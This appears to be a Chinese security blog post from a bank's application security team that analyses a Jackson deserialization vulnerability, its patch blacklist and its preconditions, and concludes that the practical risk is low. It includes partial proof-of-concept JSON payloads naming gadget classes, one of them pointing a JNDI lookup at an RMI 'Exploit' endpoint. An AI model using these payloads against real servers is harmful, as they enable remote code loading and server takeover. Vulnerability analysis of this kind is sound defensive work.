长亭百川云 - 文章详情

Jackson反序列化漏洞

Fintech 安全之路

53

2024-07-13

Author:平安银行应用安全团队@Glassy

引言

今天又看到有一些安全预警平台爆出的Jackson反序列漏洞,要求把Jackson升级到2.9.10.6,所以在下面对漏洞原理和适用范围做一下分析,并给出poc。

补丁分析

补丁特别简单,也如同漏洞公告一样,增加了几处黑名单。

POC构造

br.com.anteros.dbcp.AnterosDBCPDataSource

先看一下该jar包的maven引用次数

再构造poc(原理简单,不做细节描述)

["br.com.anteros.dbcp.AnterosDBCPDataSource", 

com.pastdev.httpcomponents.configuration.JndiConfiguration

先看一下该jar包的maven引用次数

再构造poc

["com.pastdev.httpcomponents.configuration.JndiConfiguration",

com.nqadmin.rowset.JdbcRowSetImpl

先看一下该jar包的maven引用次数

再构造poc

["com.nqadmin.rowset.JdbcRowSetImpl",{"dataSourceName":"rmi://localhost:1099/Exploit",

org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl

先看一下该jar包的maven引用次数

再构造poc

["org.arrah.framework.rdbms.UpdatableJdbcRowsetImpl",

注意:这一条poc实际上是不可用的,其原因在于该类中因为存在重名函数导致的jackson在反序列化的时候会报同名函数冲突。这是一个原理层面可用,实际不可用的poc。

总结

1. 利用成功需要enableDefaultTyping;

2. Gadget的jar极其罕见。

结论:基本没什么用,不必大惊小怪,不放心请用poc自行去测试。

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2